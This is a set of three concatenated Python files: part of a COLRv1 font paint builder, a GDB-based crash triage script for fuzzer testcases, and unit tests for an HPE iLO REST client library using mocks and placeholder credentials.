ot_paint.FirstLayerIndex = len(self.layers)
self.layers.extend(paints)
# Register our parts for reuse
for lbound, ubound in _reuse_ranges(len(paints)):
self.reusePool[_as_tuple(paints[lbound:ubound])] = (
lbound + ot_paint.FirstLayerIndex
)
return ot_paint
def buildPaint(self, paint: _PaintInput) -> ot.Paint:
if isinstance(paint, ot.Paint):
return paint
elif isinstance(paint, int):
paletteIndex = paint
return self.buildPaintSolid(paletteIndex)
elif isinstance(paint, tuple):
layerGlyph, paint = paint
return self.buildPaintGlyph(layerGlyph, paint)
elif isinstance(paint, list):
# implicit PaintColrLayers for a list of > 1
if len(paint) == 0:
raise ValueError("An empty list is hard to paint")
elif len(paint) == 1:
return self.buildPaint(paint[0])
else:
return self.buildColrLayers(paint)
elif isinstance(paint, collections.abc.Mapping):
kwargs = dict(paint)
fmt = kwargs.pop("format")
try:
return LayerV1ListBuilder._buildFunctions[fmt](self, **kwargs)
except KeyError:
raise NotImplementedError(fmt)
raise TypeError(f"Not sure what to do with {type(paint).__name__}: {paint!r}")
def build(self) -> ot.LayerV1List:
layers = ot.LayerV1List()
layers.LayerCount = len(self.layers)
layers.Paint = self.layers
return layers
LayerV1ListBuilder._buildFunctions = {
pf.value: getattr(LayerV1ListBuilder, "build" + pf.name)
for pf in ot.Paint.Format
if pf != ot.Paint.Format.PaintColrLayers
}
def buildAffine2x3(transform: _AffineTuple) -> ot.Affine2x3:
if len(transform) != 6:
raise ValueError(f"Expected 6-tuple of floats, found: {transform!r}")
self = ot.Affine2x3()
# COLRv1 Affine2x3 uses the same column-major order to serialize a 2D
# Affine Transformation as the one used by fontTools.misc.transform.
# However, for historical reasons, the labels 'xy' and 'yx' are swapped.
# Their fundamental meaning is the same though.
# COLRv1 Affine2x3 follows the names found in FreeType and Cairo.
# In all case, the second element in the 6-tuple correspond to the
# y-part of the x basis vector, and the third to the x-part of the y
# basis vector.
# See https://github.com/googlefonts/colr-gradients-spec/pull/85
for i, attr in enumerate(("xx", "yx", "xy", "yy", "dx", "dy")):
setattr(self, attr, _to_variable_f16dot16_float(transform[i]))
return self
def buildBaseGlyphV1Record(
baseGlyph: str, layerBuilder: LayerV1ListBuilder, paint: _PaintInput
) -> ot.BaseGlyphV1List:
self = ot.BaseGlyphV1Record()
self.BaseGlyph = baseGlyph
self.Paint = layerBuilder.buildPaint(paint)
return self
def _format_glyph_errors(errors: Mapping[str, Exception]) -> str:
lines = []
for baseGlyph, error in sorted(errors.items()):
lines.append(f" {baseGlyph} => {type(error).__name__}: {error}")
return "\n".join(lines)
def buildColrV1(
colorGlyphs: _ColorGlyphsDict,
glyphMap: Optional[Mapping[str, int]] = None,
) -> Tuple[ot.LayerV1List, ot.BaseGlyphV1List]:
if glyphMap is not None:
colorGlyphItems = sorted(
colorGlyphs.items(), key=lambda item: glyphMap[item[0]]
)
else:
colorGlyphItems = colorGlyphs.items()
errors = {}
baseGlyphs = []
layerBuilder = LayerV1ListBuilder()
for baseGlyph, paint in colorGlyphItems:
try:
baseGlyphs.append(buildBaseGlyphV1Record(baseGlyph, layerBuilder, paint))
except (ColorLibError, OverflowError, ValueError, TypeError) as e:
errors[baseGlyph] = e
if errors:
failed_glyphs = _format_glyph_errors(errors)
exc = ColorLibError(f"Failed to build BaseGlyphV1List:\n{failed_glyphs}")
exc.errors = errors
raise exc from next(iter(errors.values()))
layers = layerBuilder.build()
glyphs = ot.BaseGlyphV1List()
glyphs.BaseGlyphCount = len(baseGlyphs)
glyphs.BaseGlyphV1Record = baseGlyphs
return (layers, glyphs)
|
#!/usr/bin/env python3
"""
Main Script
"""
import argparse
import base64
import json
import hashlib
import os
import subprocess
import time
import rpyc
# It gets imported by base64 with the packing script
PACKED = "{{ script }}"
amd64_registers = [
'rax', 'rcx', 'rdx', 'rbx',
'rsi', 'rdi', 'rsp', 'rbp',
'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15'
]
class Analyzer:
"""
Base class representing a tool to analyze a testcase.
"""
def __init__(self):
pass
def analyze(self, testcase):
"""
Check a testcase
"""
def details(self):
"""
Returns details about the tool
"""
class GDBAnalyzer(Analyzer):
"""
GDB version of the analyzer.
"""
conn = None
def __init__(self,
binary,
binargs=[],
stdin=False,
timeout=30,
script_path='/tmp/.script.py',
wait_time=0.5,
memory=500000000):
super().__init__()
self.binary = binary
self.binargs = binargs
# as we use rpyc to talk to gdb we have to set these.
self.host = '127.0.0.1'
self.port = 1337
self.timeout = timeout
self.script_path = script_path
# Essentially, how long to wait for GDB to start up and listen
self.wait_time = wait_time
self.stdin = stdin
self.memory = memory
def analyze(self, testcase):
"""
Analyze the testcase
"""
result = {}
try:
gdb = self.start_gdb()
result = self.gdb_work(gdb, testcase)
self.conn.close()
except EOFError:
# This happens in the case of timeouts.
pass
return result
def _gdbcmd(self, params):
"""
generates the args for the gdb cmd
"""
args_s = 'py '
args_l = [
'{}="{}"'.format(key, value) for key, value in params.items()
]
args_s += ';'.join(args_l)
# Runs GDB by a timeout.
# If it still hasn't finished after `timeout` time, it received a
# SIGINT which should allow gdb to finish it's analysis so we can move
# on.
# Annoyingly, in somecases this timeout may cause GDB to coredump.
gdb_cmd = [
'timeout', '-s', 'INT', str(self.timeout),
'gdb', '-nx', '--batch-silent',
'-ex', args_s,
'-x', self.script_path,
self.binary
]
return gdb_cmd
def gdb_work(self, gdb, testcase):
"""
this is the specific stuff we want gdb to do.
"""
gdb.execute('set pagination off')
# setup the crash handlers
result = {}
def backtracer(frame):
"""
Gets the full stack backtrace
"""
backtrace = []
curr_frame = frame
# while the api docs say gdb.Architecture should include the
# registers, it actually doesn't at least on gdb 9.2, so we have to
# manually handle x86s stuff here.
registers = {}
for register in amd64_registers:
registers[register] = ('0x%016x' %
curr_frame.read_register(register))
while curr_frame is not None:
backtrace.append(
{
'address': '0x%016x' % curr_frame.pc(),
'function': '%s' % curr_frame.name(),
'registers': registers
}
)
curr_frame = curr_frame.older()
return backtrace
def crash_handler(event):
"""
Handles the crash handler
"""
nonlocal result
reason = ''
backtrace = []
try:
reason = event.stop_signal
frame = gdb.newest_frame()
backtrace = backtracer(frame)
except Exception as e:
# we get a lot of non-real exceptions from rpyc, so we have to
# skip over them like this.
#print(e)
pass
# return the results
result = {
'reason': reason,
'backtrace': backtrace
}
gdb.events.stop.connect(crash_handler)
# quick way to test the timeout behavior
# gdb.execute('!sleep 35')
path = testcase.details()['path']
# sort out the CLI args
real = []
for arg in self.binargs:
if arg == '@@':
real.append(path)
else:
real.append(arg)
# Start the program in different ways depending on how it takes input
# i.e, stdin or as a cli flag
if self.stdin:
gdb.execute(
'starti %s < %s 2>/dev/null' % (" ".join(real), path)
)
else:
gdb.execute('starti %s 2>/dev/null' % " ".join(real))
# do stuff like setup memory limits here, before progressing past the
# entry point.
inferior = gdb.selected_inferior()
# hack to limit the memory of a child process.
# requires modern linux, greater than 2.6.36.
prlimit = \
'!prlimit --pid %i --core=unlimited --as=%i' % \
(inferior.pid, self.memory)
gdb.execute(prlimit)
# and now start
gdb.execute('c')
# now we wait til an error occurs.
while True:
thread = gdb.selected_thread()
if thread and thread.is_running():
time.sleep(0.01)
else:
break
return result
@staticmethod
def _write_script(path):
"""
Dumps GDB script to disk, so it can be used.
"""
file = base64.b64decode(PACKED)
filep = open(path, 'wb')
filep.write(file)
filep.close()
return path
def start_gdb(self):
"""
Gets are gdb object so we can start doing things with it.
"""
# First, we need to place the gdb bootstrap script onto disk.
GDBAnalyzer._write_script(self.script_path)
# invoke GDB.
cmd = self._gdbcmd({'HOSTNAME': self.host, 'PORT': self.port})
GDBAnalyzer.execute(cmd)
time.sleep(self.wait_time)
# Now connect to the GDB instance.
self.conn = rpyc.connect("localhost", 1337)
return self.conn.root.gdb()
@staticmethod
def execute(cmd):
"""
wrapper to handle run a process
"""
return subprocess.Popen(cmd)
class MetaAnalyzer(Analyzer):
"""
Gets metadata on the testcase.
"""
def analyze(self, testcase):
"""
Analyzes the testcase
We get the following:
* file size
* shasum
"""
file_path = testcase.details()['path']
file_size = os.path.getsize(file_path)
file_hash = MetaAnalyzer._hash(file_path)
return {
'path': file_path,
'size': file_size,
'hash': file_hash
}
@staticmethod
def _hash(name):
file = open(name, 'rb')
fhash = hashlib.sha256()
fhash.update(file.read())
file.close()
return fhash.hexdigest()
class Testcase:
"""
Represents testcase instances
"""
results = {}
def __init__(self, name, testcase_path):
self.name = name
self.file = testcase_path
def details(self):
"""
Gets the details of this testcase
"""
return {'name': self.name, 'path': self.file, 'analysis': self.results}
def update(self, key, value):
"""
Store results with the testcase
"""
self.results[key] = value
class TriageTool:
"""
The user focused tool
"""
all_testcases = {}
all_analyzers = {}
def __init__(self, testcase_path, binary, binargs, stdin=False, timeout=30,
wait_time=0.5, memory=5000000000):
self.testcase_path = testcase_path
self.testcases()
# define all supported the analyzers here
meta = MetaAnalyzer()
gdb = GDBAnalyzer(binary, binargs, stdin=stdin, timeout=timeout,
wait_time=wait_time, memory=memory)
self.all_analyzers = {
'meta': meta,
'gdb': gdb
}
def run(self):
"""
Runs though and analyzes all the testcases
"""
results = []
for _, testcase in self.all_testcases.items():
for analyzer_name, analyzer in self.all_analyzers.items():
testcase.update(analyzer_name, analyzer.analyze(testcase))
results.append(testcase.details())
return results
def testcases(self):
"""
Find all the testcases in a path
"""
for testcase in os.scandir(self.testcase_path):
if testcase.is_file():
full_path = '{}/{}'.format(
self.testcase_path,
testcase.name
)
self.all_testcases[full_path] = Testcase(
testcase.name,
full_path
)
def save(fname, data):
output = open(fname, 'w')
obj = {'crashes': tool.run()}
output.write(json.dumps(obj))
output.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='The Little Triage Tool That Could')
parser.add_argument(
'--stdin',
help='the program takes stdin',
action='store_const',
const=True
)
parser.add_argument(
'--timeout',
help='time before sending a SIGINT',
type=int,
default=30
)
parser.add_argument(
'--wait-time',
help='time to sleep before attempting to connect to gdb',
type=float,
default=0.5
)
parser.add_argument(
'--memory',
help='memory limit for the child process (bytes)',
type=int,
default=500000000
)
parser.add_argument(
'--output',
help='file to write the results to',
type=str,
default='/dev/stdout'
)
parser.add_argument(
'testcase_dir',
help='path to testcases'
)
parser.add_argument(
'binary',
nargs='*',
help='binary to triage'
)
args = parser.parse_args()
tool = TriageTool(
args.testcase_dir,
binary=args.binary[0],
binargs=args.binary[1:],
stdin=args.stdin,
timeout=args.timeout,
wait_time=args.wait_time,
memory=args.memory
)
result = tool.run()
save(args.output, result)
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for RIS Module."""
import json
import ddt
import mock
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions as urllib3_exceptions
import testtools
from proliantutils import exception
from proliantutils.ilo import common
from proliantutils.ilo import constants
from proliantutils.ilo import ris
from proliantutils.tests.ilo import ris_sample_outputs as ris_outputs
from proliantutils import utils
class IloRisTestCaseInitTestCase(testtools.TestCase):
@mock.patch.object(urllib3, 'disable_warnings')
def test_init(self, disable_warning_mock):
ris_client = ris.RISOperations(
"x.x.x.x", "admin", "Admin", bios_password='<PASSWORD>',
cacert='/somepath')
self.assertEqual(ris_client.host, "x.x.x.x")
self.assertEqual(ris_client.login, "admin")
self.assertEqual(ris_client.password, "<PASSWORD>")
self.assertEqual(ris_client.bios_password, "<PASSWORD>")
self.assertEqual({}, ris_client.message_registries)
self.assertEqual(ris_client.cacert, '/somepath')
@mock.patch.object(urllib3, 'disable_warnings')
def test_init_without_cacert(self, disable_warning_mock):
ris_client = ris.RISOperations(
"x.x.x.x", "admin", "Admin", bios_password='<PASSWORD>')
self.assertEqual(ris_client.host, "x.x.x.x")
self.assertEqual(ris_client.login, "admin")
self.assertEqual(ris_client.password, "<PASSWORD>")
self.assertIsNone(ris_client.cacert)
disable_warning_mock.assert_called_once_with(
urllib3_exceptions.InsecureRequestWarning)
@ddt.ddt
class IloRisTestCase(testtools.TestCase):
def setUp(self):
super(IloRisTestCase, self).setUp()
self.client = ris.RISOperations("1.2.3.4", "Administrator", "Admin")
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_get_http_boot_url_uefi(self, _uefi_boot_mode_mock,
get_bios_settings_mock):
get_bios_settings_mock.return_value = ris_outputs.HTTP_BOOT_URL
_uefi_boot_mode_mock.return_value = True
result = self.client.get_http_boot_url()
_uefi_boot_mode_mock.assert_called_once_with()
self.assertEqual(
'http://10.10.1.30:8081/startup.nsh', result['UefiShellStartupUrl']
)
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_http_boot_url_uefi(self, _uefi_boot_mode_mock,
change_bios_setting_mock):
_uefi_boot_mode_mock.return_value = True
self.client.set_http_boot_url('http://10.10.1.30:8081/startup.nsh')
_uefi_boot_mode_mock.assert_called_once_with()
change_bios_setting_mock.assert_called_once_with({
"UefiShellStartupUrl": "http://10.10.1.30:8081/startup.nsh"
})
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_get_http_boot_url_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.get_http_boot_url)
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_http_boot_url_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.set_http_boot_url,
'http://10.10.1.30:8081/startup.nsh')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_uefi(self, _uefi_boot_mode_mock,
check_iscsi_mock, patch_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
check_iscsi_mock.return_value = iscsi_uri
initiator_iqn = 'iqn.2011-07.com.example.server:test1'
initiator_info = {'iSCSIInitiatorName': initiator_iqn}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.set_iscsi_initiator_info(initiator_iqn)
patch_mock.assert_called_once_with(iscsi_uri, None, initiator_info)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_failed(self, _uefi_boot_mode_mock,
check_iscsi_mock, patch_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
check_iscsi_mock.return_value = iscsi_uri
initiator_iqn = 'iqn.2011-07.com.example.server:test1'
initiator_info = {'iSCSIInitiatorName': initiator_iqn}
patch_mock.return_value = (302, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client.set_iscsi_initiator_info,
initiator_iqn)
patch_mock.assert_called_once_with(iscsi_uri, None, initiator_info)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.set_iscsi_initiator_info,
'iqn.2011-07.com.example.server:test1')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_change_iscsi_settings')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_info_uefi(self, _uefi_boot_mode_mock,
change_iscsi_settings_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_variables = {
'iSCSITargetName': 'iqn.2011-07.com.example.server:test1',
'iSCSITargetInfoViaDHCP': False,
'iSCSIBootLUN': '1',
'iSCSIBootEnable': 'Enabled',
'iSCSITargetIpAddress': '10.10.1.30',
'iSCSITargetTcpPort': 3260}
self.client.set_iscsi_info(
'iqn.2011-07.com.example.server:test1',
'1', '10.10.1.30')
_uefi_boot_mode_mock.assert_called_once_with()
change_iscsi_settings_mock.assert_called_once_with(iscsi_variables)
@mock.patch.object(ris.RISOperations, '_change_iscsi_settings')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_unset_iscsi_info_uefi(self, _uefi_boot_mode_mock,
change_iscsi_settings_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_variables = {'iSCSIBootEnable': 'Disabled'}
self.client.unset_iscsi_info()
_uefi_boot_mode_mock.assert_called_once_with()
change_iscsi_settings_mock.assert_called_once_with(iscsi_variables)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_unset_iscsi_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.unset_iscsi_info)
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info(self, check_bios_mock,
get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
iscsi_settings)
ret = self.client.get_iscsi_initiator_info()
self.assertEqual(ret, 'iqn.1986-03.com.hp:uefi-p89-mxq45006w5')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info_failed(self, check_bios_mock,
get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (202, ris_outputs.GET_HEADERS,
iscsi_settings)
self.assertRaises(exception.IloError,
self.client.get_iscsi_initiator_info)
check_bios_mock.assert_called_once_with()
get_mock.assert_called_once_with(iscsi_uri)
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info_not_found(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_iscsi_initiator_info)
check_bios_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.set_iscsi_info,
'iqn.2011-07.com.example.server:test1',
'1', '10.10.1.30')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode(self, get_details_mock, rest_get_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
uri = ris_outputs.REST_GET_SECURE_BOOT['links']['self']['href']
rest_get_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_GET_SECURE_BOOT)
result = self.client.get_secure_boot_mode()
self.assertFalse(result)
get_details_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode_fail(self, get_details_mock, rest_get_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
uri = ris_outputs.REST_GET_SECURE_BOOT['links']['self']['href']
rest_get_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
exc = self.assertRaises(exception.IloError,
self.client.get_secure_boot_mode)
get_details_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(uri)
self.assertIn('FakeFailureMessage', str(exc))
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode_not_supported(self, get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
del host_response['Oem']['Hp']['links']['SecureBoot']
get_details_mock.return_value = host_response
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_secure_boot_mode)
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_host_power_status_ok(self, get_details_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
result = self.client.get_host_power_status()
self.assertEqual(result, 'OFF')
get_details_mock.assert_called_once_with()
@mock.patch.object(common, 'wait_for_ilo_after_reset')
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_ok(self, get_mock, post_mock, status_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
manager_data)
post_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.reset_ilo()
get_mock.assert_called_once_with(uri)
post_mock.assert_called_once_with(uri, None, {'Action': 'Reset'})
status_mock.assert_called_once_with(self.client)
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_fail(self, get_mock, post_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.HEADERS_FOR_REST_OP,
manager_data)
post_mock.return_value = (301, ris_outputs.HEADERS_FOR_REST_OP,
ris_outputs.REST_FAILURE_OUTPUT)
exc = self.assertRaises(exception.IloError, self.client.reset_ilo)
get_mock.assert_called_once_with(uri)
post_mock.assert_called_once_with(uri, None, {'Action': 'Reset'})
self.assertIn('FakeFailureMessage', str(exc))
@mock.patch.object(ris.RISOperations, '_get_type')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_type_mismatch(self, get_mock, type_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.HEADERS_FOR_REST_OP,
manager_data)
type_mock.return_value = 'Manager.x'
self.assertRaises(exception.IloError, self.client.reset_ilo)
get_mock.assert_called_once_with(uri)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_reset_secure_boot_keys(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = True
self.client.reset_secure_boot_keys()
_uefi_boot_mode_mock.assert_called_once_with()
change_mock.assert_called_once_with('ResetToDefaultKeys', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_reset_secure_boot_keys_bios(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.reset_secure_boot_keys)
_uefi_boot_mode_mock.assert_called_once_with()
self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_clear_secure_boot_keys(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = True
self.client.clear_secure_boot_keys()
_uefi_boot_mode_mock.assert_called_once_with()
change_mock.assert_called_once_with('ResetAllKeys', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_clear_secure_boot_keys_bios(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.clear_secure_boot_keys)
_uefi_boot_mode_mock.assert_called_once_with()
self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_set_secure_boot_mode(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = True
self.client.set_secure_boot_mode(True)
_uefi_boot_mode_mock.assert_called_once_with()
change_mock.assert_called_once_with('SecureBootEnable', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_set_secure_boot_mode_bios(self, change_mock,
_uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.set_secure_boot_mode, True)
_uefi_boot_mode_mock.assert_called_once_with()
self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_product_name(self, get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_response
result = self.client.get_product_name()
self.assertEqual(result, 'ProLiant BL460c Gen9')
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test_get_current_boot_mode(self, bios_mock):
bios_mock.return_value = 'LegacyBios'
result = self.client.get_current_boot_mode()
self.assertEqual(result, 'LEGACY')
@mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_pending_boot_mode(self, check_mock, bios_mock):
check_mock.return_value = ('fake', 'fake',
json.loads(ris_outputs.GET_BIOS_SETTINGS))
bios_mock.return_value = ('fake', 'fake',
json.loads(ris_outputs.GET_BIOS_SETTINGS))
result = self.client.get_pending_boot_mode()
self.assertEqual(result, 'UEFI')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_pending_boot_mode_legacy(self, change_mock):
self.client.set_pending_boot_mode('legacy')
change_mock.assert_called_once_with({'BootMode': 'LegacyBios'})
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_pending_boot_mode_uefi(self, change_mock):
self.client.set_pending_boot_mode('uefi')
expected_properties = {'BootMode': 'uefi',
'UefiOptimizedBoot': 'Enabled'}
change_mock.assert_called_once_with(expected_properties)
def test_set_pending_boot_mode_invalid_mode(self):
self.assertRaises(exception.IloInvalidInputError,
self.client.set_pending_boot_mode, 'invalid')
@ddt.data((0, constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_ONLY),
(3, constants.SUPPORTED_BOOT_MODE_UEFI_ONLY),
(2, constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_AND_UEFI))
@ddt.unpack
@mock.patch.object(ris.RISOperations, '_get_host_details', autospec=True)
def test_get_supported_boot_mode(
self, raw_boot_mode_value, expected_boot_mode_value,
_get_host_details_mock):
# | GIVEN |
system_val = {'Oem': {'Hp': {'Bios':
{'UefiClass': raw_boot_mode_value}}}}
_get_host_details_mock.return_value = system_val
# | WHEN |
actual_val = self.client.get_supported_boot_mode()
# | THEN |
self.assertEqual(expected_boot_mode_value, actual_val)
@mock.patch.object(ris.RISOperations, '_get_host_details', autospec=True)
def test_get_supported_boot_mode_returns_legacy_bios_if_bios_atrrib_absent(
self, _get_host_details_mock):
# | GIVEN |
system_val = {'Oem': {'Hp': {'blahblah': 1234}}}
_get_host_details_mock.return_value = system_val
# | WHEN |
actual_val = self.client.get_supported_boot_mode()
# | THEN |
self.assertEqual(constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_ONLY,
actual_val)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test_reset_ilo_credential(self, collection_mock, patch_mock):
uri = '/rest/v1/AccountService/Accounts/1'
collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
item = collection_output['Items'][0]
collection_mock.return_value = [(200, None, item, uri)]
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.reset_ilo_credential('fake-password')
patch_mock.assert_called_once_with(uri, None,
{'Password': '<PASSWORD>'})
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test_reset_ilo_credential_fail(self, collection_mock, patch_mock):
uri = '/rest/v1/AccountService/Accounts/1'
collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
item = collection_output['Items'][0]
collection_mock.return_value = [(200, None, item, uri)]
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client.reset_ilo_credential,
'fake-password')
patch_mock.assert_called_once_with(uri, None,
{'Password': '<PASSWORD>'})
@mock.patch.object(ris.RISOperations, '_get_collection')
